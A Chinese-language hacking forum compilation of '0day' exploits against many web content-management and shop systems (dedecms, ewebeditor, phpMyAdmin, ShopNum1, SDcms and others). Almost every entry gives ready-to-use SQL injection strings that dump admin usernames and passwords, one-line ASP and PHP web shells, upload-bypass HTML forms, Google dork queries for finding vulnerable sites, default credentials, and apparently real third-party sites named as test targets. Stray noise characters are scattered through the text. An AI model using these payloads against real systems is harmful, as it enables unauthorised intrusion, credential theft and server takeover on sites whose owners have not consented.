0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本
8 p0 p0 R3 ~6 H* q1 S3 P
1 S, a. U# ^8 Y- }直接上exploit:
$ M2 b/ f$ w3 pjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
% U/ u6 ], u8 N! [& ~& S5 D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 A* h; w! n/ U  C- hAsprain论坛 注册用户 上传图片就可拿到webshell

Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
5 B- M- U7 P" D5 |' [4 M% J2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
3 y5 C  N# z$ ]% k3 ?. ]; {4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
  g4 `2 o1 t* Q# m+ T5.q.asp;.gif
google：Powered by Asprain
0 Y- ^' v+ k; a( V2 O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, T  `3 f" t# f) M3 ^8 e2 D
$ @2 R( F2 r# j- N' F# bShopNum1全部系统存在上传漏洞。

8 z% I% ]; o9 }5 q5 X首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
按说明 提示登录后台。。
在后台功能页面->附件管理->附件列表
2 j5 j+ j. R( Y! Z% d可以直接上传.aspx 后缀木马
http://demo.shopnum1.com/upload/20110720083822500.aspx
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

: ~# J% @) i: y/ E/ ]0 U9 ~( J牛牛CMS中小企业网站管理系统 上传漏洞

( L  b/ S! D! H8 E% _; t* k/ O牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
9 `! z* @1 N. _) T7 X后台:admin/login.asp
  v6 O& Z: U  l' G, B+ a% |$ ^ewebeditor 5.5 Nday
exp:
0 s" r  t  c' S7 n. d$ ]" {4 i<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
4 ~! Z' y; L. O<input?type=submit?value=upload>?
) e* t% [- `$ @% Z) O( c' ]0 ?, V# Z</form>
ps:先上传小马.
' x) k0 C; C% Jinurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏
0 N/ ~3 v0 G6 a
& a  s/ F0 A; b* U+ Q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

YothCMS 遍历目录漏洞

" p9 `8 `' e" V6 q0 K4 G优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
/ p" _: O$ t1 {默认后台:admin/login.asp
$ G- R* O* b1 ~) h遍历目录:
9 b- V' q4 ^2 j. |8 i; k! p1 R6 Qewebeditor/manage/upload.asp?id=1&dir=../
) H- u  |. i3 S3 X, ydata:
6 m! E6 e. q7 Q+ chttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# A! x6 ~4 _% t# u, W& v
! Q2 h4 l9 T( cNet112企业建站系统 1.0
  C. p# C+ R0 W+ E. J! O
- ]4 W& u; I( q+ ]6 r源码简介：
" h: m: u* L! vNet112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
6 v' q- n" B) F0 [) ]! [" ?添加管理员：
http://www.0855.tv/admin/admin.asp?action=add&level=2
% U5 ~( R" o8 m其实加不加都不是很重要，后台文件都没怎么作验证。
3 t, ~: N% `1 P) }9 s! D5 {! f上传路径：
, T1 R( s! T; g9 f; M5 l9 `7 |http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
3 L+ P' `+ K2 [http://www.0855.tv/inc/Upfile.asp?Stype=2
怎么利用自己研究。
; a! r( w4 z% F+ @9 u2 R9 l# D遍历目录：
0 ^$ Z! G" l8 i; Ohttp://www.0855.tv/admin/upfile.asp?path=../..
如：
http://www.0855.tv/admin/upfile.asp?path=../admin
& w5 M/ w2 [4 d. N+ S/ ~http://www.0855.tv/admin/upfile.asp?path=../data
8 h( G, z1 a% M, \: y% x5 M* p--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

易和阳光购物商城通杀 上传漏洞

4 X7 n( S, ^5 m) Q! t- A前提要求是IIS6.0+asp坏境。
7 W; n! t; x4 n漏洞文件Iheeo_upfile.asp
过滤不严.直接可以iis6.0上传
把ASP木马改成0855.asp;1.gif
5 ~4 t$ k0 e. u* ~直接放到明小子上传
Google搜索：inurl:product.asp?Iheeoid=
8 y" Z$ k0 Z; U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

; o! U& L& `5 O3 ~3 P9 e: Yphpmyadmin后台4种拿shell方法
) C5 o, H" h" H( n( f& ~8 k' c
方法一：
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
2 r- ?! {4 ~; p: o( t; q0 [) f) lSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
- }6 G; _/ \- L: ~----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
6 C, i) O) i) a# |5 J* R3 @2 K9 H一句话连接密码：xiaoma
: Y3 A" ?( ?% g/ `2 }方法二：
: b9 m+ B. Z( F* U. VCreate TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;
, D( P3 a  Q: h8 G- G8 u方法三：
7 z1 `# z! ^, v. |; U: @+ X读取文件内容：    select load_file('E:/xamp/www/s.php');
' ?. u# P$ ^% Z+ c/ J1 e  r7 g写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% j$ Y; S$ t1 ^7 D5 o  O0 Q2 ncmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( }8 l. b. a- N8 Q6 Y6 {方法四：
select load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 n& e7 U+ P- Q$ Y* Y
+ i0 F+ g. C7 ]0 @) M6 M2 e传信网络独立开发网站源码0day漏洞

; c  Z- Z/ R( c  t& k后台system/login.asp
2 K+ O: I6 |0 [# m4 _. N进了后台有个ewebeditor
Google 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
; |/ A2 R& c; ]& Z数据库ubbcode/db/ewebeditor.mdb
默认账号密码yzm 111111
& p( N4 R% p3 z, W" T7 q0 g3 [  X
拿webshell方法
登陆后台点击“样式管理”-选择新增样式
样式名称:scriptkiddies 随便写
路径模式：选择绝对路径
" k0 b- d) b" o/ V0 \图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
1 T0 g& l% \7 Z' E/ j图片类型比如就是我们要上传的ASP木马格式
. _" c( j( P- B; x. F上传路径：/
图片限制：写上1000 免的上不了我们的asp木马
- t- G+ ^3 V2 C. w! r上传内容不要写
1 c# [8 y) T% `1 ~/ K可以提交了
样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
# K# q8 b; j; T; B( d/ x按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
. p+ `' k$ s+ x# p# b' ^网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
上ASP木马 回车 等到路径

后台：system/login.asp
Exp:
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
测试:
! H- k4 G" @3 u6 Rhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

( K0 f  x* E6 U8 ~' W7 [  W2 ifoosun 0day 最新注入漏洞
) k! M9 c; o# B9 T0 t
- N7 h  w6 p# N漏洞文件：www.xxx.com/user/SetNextOptions.asp
利用简单的方法：
暴管理员帐号：
# s8 C% j. }. ?http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
+ J! g3 Q! S5 L1 x( ~) }, r( C暴管理员密码：
: N7 T4 h$ n2 [3 j  j# \; Ihttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

9 X% ^9 F* l8 F4 n网站程序的版权未知！

( `( w0 ~  h; _默认网站数据库：
www.i0day.com/data/nxnews.mdb
. `$ |3 _! V' x) d/ m4 ?ewebeditor 在线编辑器：
编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
登录地址：ewebeditor/admin_login.asp
# f8 U9 g# F! X( k( ?8 v  h" t' K默认密码：admin  admin
/ `# E  E1 V0 K5 p登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

9 N4 I$ Z) h/ X3 k. V+ C( G$ HSql注入漏洞：
& e  }9 K, L' m3 d7 ehttp://www.i0day.com/detail.asp?id=12
( k+ h( z8 s7 o' \exp:
union select 1,admin,password,4,5,6,7,8 from admin
% j. f, u, J- b4 P7 h2 ?5 t% }3 s4 S爆出明文帐号/密码

8 X8 k, m* M$ T- P  S上传漏洞：
# ^, ]: O8 z  d' a- @4 l% O后台+upfile.asp
3 P0 g* m8 X! I6 m如：
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址：网址+后台+成功上传的马
3 X/ Z8 k) A% ?- F: |google:inurl:news.asp?lanmuName=
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 B4 y% w5 L& g! N2 N  v
dedecms最新0day利用不进后台直接拿WEBSHELL

拿webshell的方法如下：
0 O. A7 O1 C3 y- ^9 V. n. K! H网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
! z0 _, m) Z  J  P: n前题条件，必须准备好自己的dede数据库，然后插入数据：
6 p: v8 V# T& b6 e/ F5 [3 {insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
2 ~+ B2 J! [2 K8 L2 M" J/ u
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
% o* B! q6 _4 _9 M5 ?( l: R3 y7 ], w5 M<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
, M  T. U& ]0 e- K<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
) C. B9 k6 F/ h<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
4 w" a9 m( B* [. B4 Z<input type="text" value="true" name="nocache" style="width:400">
8 c) M* ]; m3 ~3 q& b<input type="submit" value="提交" name="QuickSearchBtn"><br />
/ n5 ?! c! R* g3 ^/ n& r# X</form>
. H/ L9 D2 n6 _* U+ [  q: t<script>
& Z( ^. j( u- R6 zfunction addaction()
{
- q1 u3 x, X" I$ A$ g# D/ u' Adocument.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
2 B2 c" j* V- z-----------------------------------------------------------------------------------------------------------------------------------------------
- \4 l- A' U- p" g2 ?
dedecms织梦暴最新严重0day漏洞
$ f% D9 m: G0 y( w9 V- \/ S* Kbug被利用步骤如下：
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
-------------------------------------------------------------------------------------------------------------------------------------------

/ r( o% U$ @5 K" z/ ^多多淘宝客程序上传漏洞
漏洞页面：
5 D, \. W! G# T8 kadmin\upload_pic.php
- C& m* E; E( y- n. I传送门：
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
PS:copy张图片马 直接  xxx.php 上传抓包地址！
------------------------------------------------------------------------------------------------------------------------------------------------------

无忧公司系统ASP专业版后台上传漏洞
! @6 ~6 Z  Y+ X漏洞文件 后台上传
. x4 d& Q  c* I5 M0 Ladmin/uploadPic.asp
. O& X! @) I( J1 v* M漏洞利用 这个漏洞好像是雷池的
& h' N3 D, w& j( D3 `: Y3 lhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
3 o' i% q; k( a8 H; c8 ~- h等到的webshell路径：
/UploadFiles/scriptkiddies.asp;_2.gif
---------------------------------------------------------------------------------------------------------------------------------------------------

2 E' }0 v7 w, O& B住哪酒店分销联盟系统2010
Search：
  I7 B8 ?& _7 p5 Q$ O. B6 Kinurl:index.php?m=hotelinfo
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默认后台：index.php?m=admin/login
/ P7 F' j$ t- E+ y) _1 s--------------------------------------------------------------------------------------------------------------------------------------------------
4 I) R2 h  y: h/ P$ A$ l
! v+ P- ?' M- h. ^inurl:info_Print.asp?ArticleID=
后台 ad_login.asp
4 {* |) @6 b! ^) M, ~) O" u3 p爆管理员密码：
$ A9 ?& X9 ^/ [# h, _- `union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------

' w4 f5 M" T$ b: O/ [$ N3 V搜索框漏洞！
  G  Y8 P5 ^4 O, W, A* C%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
--------------------------------------------------------------------------------------------------------------------------------------------------------
3 x9 ^/ d1 h( q9 |, @
+ H% r: y" e; w2 N& E9 {关键字：
inurl:/reg_TemletSel.asp?step=2
8 w- k1 F9 C* m4 x) h" J/ p1 G或者
电子商务自助建站--您理想的助手
-------------------------------------------------------------------------------------------------------------------------------------------------

# {. |! m. m, ZiGiveTest 2.1.0注入漏洞
( V: \9 d9 G7 C- F4 R3 a5 lVersion: <= 2.1.0
- a7 E; n" g; A, p; k% M# Homepage: http://iGiveTest.com/
谷歌关键字: “Powered by iGiveTest”
随便注册一个帐号。然后暴管理员帐号和密码
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
------------------------------------------------------------------------------------------------------------------------------------------------

$ `. ~7 i% S2 e" iCKXP网上书店注入漏洞
' y% m0 i6 D) M3 q0 w0 B" d- y工具加表:shop_admin 加字段:admin
2 f: d2 A2 H. Q  o+ y0 E* t后台:admin/login.asp
2 h  z. A2 [. o0 B% M6 M2 {% g, w登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
4 T+ \4 X0 }- [  r! z4 einurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
5 s+ `: L$ `, ]- z0 `) j/ M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 j! {/ L: ^% {5 N' L
3 m. J; b+ T0 {4 A' p% G, K- k段富超个人网站系统留言本写马漏洞
源码下载：http://www.mycodes.net/24/2149.htm
addgbook.asp 提交一句话。
连接： http://www.xxxx.tv/date/date3f.asp
1 k) y% k) I6 [9 ]6 B2 ogoogle:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 Y* L  D! N2 |0 z. {
智有道专业旅游系统v1.0 注入及列目录漏洞
" R! c- Y" I; S. k默认后台路径：/admin/login.asp
默认管理员：admin
5 D4 b- p* a2 ^& u: C1 V, l! b默认密码：123456
SQL EXP Tset:
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
+ T& s0 [; f0 F5 X------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ewebeditor(PHP) Ver 3.8 本任意文件上传0day
/ U6 U3 @3 B4 G9 R# zEXP：
/ b8 x6 e" k5 k0 |7 m- q; d% r; L4 Z<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multip
art/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
# _' y6 t" o: Z* p' c( c( Z9 }URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
* n% r" {+ t- g7 d: ^4 x<input type=button value=submit onclick=fsubmit()>
/ C. Y+ ?8 M4 G0 ^+ V: h</form><br>
<script>
function fsubmit(){
7 M" e' n! z. t) Oform = document.forms[0];
- j: K* B& ?2 X* u" mform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
" ^' s3 j* m/ u/ d, f# ?alert(form.action);
3 k) w2 W  B9 j1 j' Nform.submit();
8 h) \, r) Q. _! e+ S/ t, {}
</script>
注意修改里面ewebeditor的名称还有路径。
7 Q8 m, d0 N: N3 W1 P, p6 u---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

提交’时提示ip被记录 防注入系统的利用
6 D* J* Z8 E& K" i+ w. y6 j5 i网址：http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被记录!”等信息。
) p! `+ `! A* U利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. W5 v6 r! d) ?. J
西部商务网站管理系统 批量拿shell-0day
: B0 B; f: ]1 G8 Y8 [/ G这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
& Y5 S6 }0 e- |' A2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
0 _* S0 U& K( q0 v# T3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
$ i4 ]' a# \. n+ R4 q  K8 w---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 d% p& j0 W, q5 E1 s  [
$ ?! x$ \5 g/ {/ B- a+ gJspRun!6.0 论坛管理后台注入漏洞
2 P% y4 E$ T2 Y! d" j
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
JspRun!6.0
( ]6 D/ I! z( U1 o漏洞描述:
  t+ b" s8 n' [  y- U6 L) qJspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
3 \0 f+ h2 T, f' K  S5 IString export = request.getParameter("export");//直接获取，没有安全过滤
% @( R8 l+ g/ f4 Z6 Bif(export!=null){
4 E, K' n$ p6 x/ O' C; nList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
if(styles==null||styles.size()==0){
! V1 V# i9 J8 }$ N1 r<*参考
2 Z" V. l2 S: R& e3 h- r7 ?[email protected]
*> SEBUG安全建议:
7 O5 J4 U& e7 cwww.jsprun.net
' ]/ \8 w2 A& H, M（1）安全过滤变量export
（2）在查询语句中使用占位符
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

" s5 h5 K# v" Z* N乌邦图企业网站系统 cookies 注入

6 W0 d0 |9 h; O; U3 B! p程序完整登陆后台:/admin/login.asp
6 b- @7 Y0 e6 X- D/ G* k% A# t% r$ W默认登陆帐号:admin 密码:admin888
1 g  X6 L3 g- ?. o语句：(前面加个空格)
0 I( L- S$ y( W( X  C) ?and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
- R4 D% U  h5 C8 Y$ m, P或者是16个字段：
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
1 R. Z! }. ]: N. c0 Q* Y) f注入点：http://www.untnt.com/shownews.asp?=88
0 G$ w* R( Z$ {( d" C. @$ V. qgetshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
& Z# ]' ^0 o( {关键字：
" R/ Z5 K! j6 T* Qinurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: v$ B, w% y5 D- t: E* h5 j
; @( e4 g+ ~& q( t5 d( c" aCKXP网上书店注入漏洞
5 p( S, W/ x- C' _- [1 P
/ K$ T. @/ i7 T: E. n: E工具加表:shop_admin 加字段:admin
后台:admin/login.asp
; n2 e$ ~0 w' {登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 p8 S! B/ v% R: }* _* Q
YxShop易想购物商城4.7.1版本任意文件上传漏洞
% C6 G- T+ l: ~6 x& j0 c  N' A
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
7 X) s# @! p4 W  w& o% y; f跳转到网站根目录上传任意文件。
  ]0 n# C) R% @( n% k如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
) a2 p. C$ l! P2 xUpload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
( i% H1 V; N. ~( O<input id="btnUpload" type="submit" value="Upload">
</form>
" k3 S/ ]$ Y7 E2 i" a3 p* b-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

. c6 X7 y9 z" u3 m, fSDcms 后台拿webshell

/ N: _1 C# Q. v9 e第一种方法：
, `; o# m1 g6 Z0 f进入后台-->系统管理-->系统设置-->系统设置->网站名称;
& v; q$ x! K1 |* X5 \5 ?+ n: R" s) v把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
% X  S9 D- q! i) e; O5 K用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
, t) h# D' h: p2 L( f  G* V& H; K第二种方法：
5 X; B7 R6 h0 h) {6 R2 I进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
# i2 J2 u& v2 W5 x6 g第三种方法：
( ~1 I2 M8 ?# \( K- _5 H1 t* w+ J进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容：
1 W" u; U3 l  S; d/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
: k  @6 V! P8 g, ~6 Susing System;
using System.Web;
, n! e. K; j9 J/ M2 tusing System.IO;
public class Handler : IHttpHandler {
* c6 G3 P' U* u7 a8 ypublic void ProcessRequest (HttpContext context) {
3 ~# k7 Z* K8 b$ A+ ]: O, A1 Ocontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
$ Q( S/ ]' P8 c  k4 G, ^  e+ wfile1.Flush();
file1.Close();
9 E" x/ ?, [' R! p" l}
6 _% ]% q$ k/ q+ h; q& K- ?public bool IsReusable {
7 {2 o( J/ U, b' P. cget {
return false;
}
4 p1 i" z4 S" ?8 Z}
: A; L8 ]3 t# A' F}
/=============================================/
访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
! [5 n# h, g8 \8 P- }会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
* J2 }& h4 p3 }2 i-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# F) q7 [# P9 I7 ]
ESCMS网站管理系统0day
. K/ T2 c" q* {6 j# E) m6 \$ R' U
" z! z* f2 U0 f5 A后台登陆验证是通过admin/check.asp实现的
4 t! [% }, ~6 w4 k
6 O+ o7 V$ r3 M9 `首先我们打开http://target.com/admin/es_index.html
! t. n8 K7 ]  L* d7 `+ H, s然后在COOKIE结尾加上
; ESCMS$_SP2=ES_admin=st0p;
! Z& U2 ^* F( J8 U. [+ D* x, v2 ]修改,然后刷新
进后台了嘎..
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL

: d! r+ ?+ d2 d$ V& ?利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
- i8 @$ @  ~0 x存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
" `" t! x0 g6 W( q& r9 J6 u8 e在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
; u; I% x4 n! \) E! U2 Y------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

! K. y; v/ E6 ^- B7 w$ @  d宁志网站管理系统后台无验证漏洞及修复

网上搜了一下,好像没有发布.如有雷同纯粹巧合!
官方网站:www.ningzhi.net
$ U1 P. \) f/ R/ `6 G+ [7 ~学校网站管理系统 V.2011版本
% {2 l- Y& R! X4 C! p: c+ yhttp://down.chinaz.com/soft/29943.htm
) E! a$ P: H3 y- [( p( j' ~2 V. \其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
/ y9 {" N" W9 B1 V+ @login.asp代码如下:
4 }% I9 t* f: ]<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
manage.asp代码我就不帖出来了.反正也没验证.
: J. t/ f: R5 @( G' T9 ]0 {只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
漏洞利用:
直接访问http://www.0855.tv/admin/manage.asp
, h" H) U$ C9 b7 k: q2 W& \数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
& p; L. f2 H! u----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

' W/ E: j/ a, k1 }phpmyadmin拿shell的四种方法总结及修复
1 h7 B  x3 e- v% m7 D; K
方法一：
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
3 e& b: q/ }2 h$ bINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on
" e) v% U' Y( e% A) H; K方法二：
读取文件内容：    select load_file('E:/xamp/www/s.php');
% Z# d7 q8 M+ ?写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
* V# H7 k$ l; ~: h7 {方法三：
* x- @6 r- e) ~# M6 L/ @0 YJhackJ版本 PHPmyadmin拿shell
  ~0 @3 b2 d: ]3 W) GCreate TABLE study (cmd text NOT NULL);
2 l- o! Q0 R9 o1 i2 tInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
: s; O) ?6 p  V* ?5 A6 z% [select cmd from study into outfile 'E:/wamp/www/7.php';
